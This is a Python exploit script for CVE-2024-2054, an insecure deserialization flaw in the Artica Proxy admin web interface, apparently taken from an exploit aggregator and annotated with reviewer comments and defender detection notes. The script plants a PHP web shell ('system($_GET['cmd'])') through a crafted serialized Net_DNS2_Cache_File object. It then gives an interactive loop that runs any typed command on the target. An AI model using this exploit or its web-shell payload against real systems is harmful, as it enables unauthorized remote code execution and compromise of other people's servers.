## https://sploitus.com/exploit?id=PACKETSTORM:190376
# Exploit Title: CVE-2024-2054 Artica-Proxy administrative web application insecure deserialization (RCE)
    # Google Dork:
    # Date: 23-04-2024
    # Exploit Author: Madan
    # Vendor Homepage: https://artica-proxy.com/
    # Version: 4.40, 4.50
    # Tested on: [relevant os]
    # CVE : CVE-2024-2054
    
    # You can also find the exploit in my GitHub repo:
    # https://github.com/Madan301/CVE-2024-2054
    
    
    import requests
    import base64
    import urllib3
    from colorama import Fore
    
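    # Tell the operator which URL shape is expected. The message is one string
    # split with implicit concatenation, so the literal no longer breaks
    # across a physical line.
    print("Url format Ex: https://8x.3x.xx.xx:9000 the port 9000 might "
          "sometimes vary from how artica proxy interface is hosted")

    URL = input("Enter url: ")
    # Drop a single trailing slash so request paths can be appended later.
    # endswith() also copes with empty input, where URL[-1] raised IndexError.
    ACTUAL_URL = URL[:-1] if URL.endswith("/") else URL

    ARTICA_URL = ACTUAL_URL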
    
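    def check(ARTICA_URL):
        """Probe whether the wizard upload endpoint answers on the target.

        Sends one GET to ``<ARTICA_URL>/wizard/wiz.upload.php`` with TLS
        certificate verification disabled and reports on the status code.

        NOTE(review): an HTTP 200 only shows that the endpoint is reachable.
        It is not proof that the host is vulnerable to CVE-2024-2054, and a
        non-200 answer is not proof that it is patched. Confirm against the
        installed Artica version (the page header lists 4.40 and 4.50).

        Args:
            ARTICA_URL: Base URL of the Artica web interface, without a
                trailing slash.

        Returns:
            True when the endpoint answers HTTP 200, otherwise False
            (including when the host cannot be reached).
        """
        # verify=False skips certificate validation, so urllib3 would warn on
        # every request; the warning is silenced here.
        urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
        try:
            response = requests.get(
                ARTICA_URL + '/wizard/wiz.upload.php',
                verify=False,
                timeout=10,  # do not hang forever on an unresponsive host
            )
        except requests.RequestException:
            # Return here: the original fell through and hit an unbound
            # local when the request itself failed.
            print(Fore.RED+"Could not reach, check URL")
            return False
        if response.status_code == 200:
            print(Fore.GREEN+"Vulnerable")
            return True
        print(Fore.RED+"Not Vulnerable")
        return False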
    
    
    def exploit(ARTICA_URL):
        """Interactive loop: send the PoC request, then a follow-up command request.

        Each iteration reads a command from stdin and issues a GET to
        ``/wizard/wiz.wizard.progress.php`` with ``payload_data`` formatted
        into the ``build-js`` query parameter. If that answers HTTP 200, it
        issues a second GET to ``/wizard/wiz.upload.php`` with the command in
        the ``cmd`` query parameter and prints the response body. The loop
        has no exit condition.

        Defender notes, drawn from the requests this function makes:
          * Web / reverse-proxy logs: requests to
            /wizard/wiz.wizard.progress.php carrying a ``build-js``
            parameter, and requests to /wizard/wiz.upload.php carrying a
            ``cmd`` parameter.
          * The literal token ``TzoxOToiTmV0X0ROUzJfQ2FjaGVfRmlsZSI`` in a
            query string; it is the base64 text of a PHP serialized-object
            header naming ``Net_DNS2_Cache_File``.
          * File integrity: unexpected changes to
            /usr/share/artica-postfix/wizard/wiz.upload.php, the path set in
            ``cache_file`` below.
          * NOTE(review): nothing on this page shows the script was validated
            against a live target ("Tested on" is left as a template
            placeholder). A failed run is therefore not evidence that a host
            is patched. The fixed release is not stated on this page;
            confirm it with the vendor.

        Args:
            ARTICA_URL: Base URL of the Artica web interface, without a
                trailing slash.
        """

        # Base64 text of a one-line PHP snippet; used below as a key inside
        # cache_data.
        payload = base64.b64encode(b"<?php system($_GET['cmd']); ?>").decode()
        payload_data = {
            # Base64 text naming the Net_DNS2_Cache_File class (see docstring).
            "TzoxOToiTmV0X0ROUzJfQ2FjaGVfRmlsZSI": {
                # presumably the file the deserialized object writes to;
                # verify against the advisory for CVE-2024-2054
                "cache_file": "/usr/share/artica-postfix/wizard/wiz.upload.php",
                "cache_serializer": "json",
                "cache_size": 999999999,
                "cache_data": {
                    payload: {
                        "cache_date": 0,
                        "ttl": 999999999
                    }
                }
            }
        }


        while True:
            PAYLOAD_CMD = input("enter command: ")
            # payload_data is interpolated directly into the build-js query
            # parameter; the same request is re-sent on every iteration.
            url = f"{ARTICA_URL}/wizard/wiz.wizard.progress.php?build-js={payload_data}"
            # verify=False below skips TLS certificate validation; this
            # silences the resulting urllib3 warning.
            urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
            response = requests.get(url, verify=False)
            # Repeated call; the warning is already disabled at this point.
            urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
            if response.status_code == 200:
                # The cmd value is taken verbatim from stdin.
                cmd_url = f"{ARTICA_URL}/wizard/wiz.upload.php?cmd={PAYLOAD_CMD}"
                cmd_response = requests.get(cmd_url, verify=False)
                # Repeated call; the warning is already disabled at this point.
                urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
                print(cmd_response.text)
            else:
                # Only the status code of the first request is checked.
                print("Failed to execute the payload")
    
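    # Continue only when the probe reported HTTP 200 on the wizard endpoint.
    # The result gets its own name so the check() function is not rebound to
    # its return value.
    endpoint_ok = check(ARTICA_URL=ACTUAL_URL)
    if endpoint_ok:
        exploit(ARTICA_URL=ARTICA_URL)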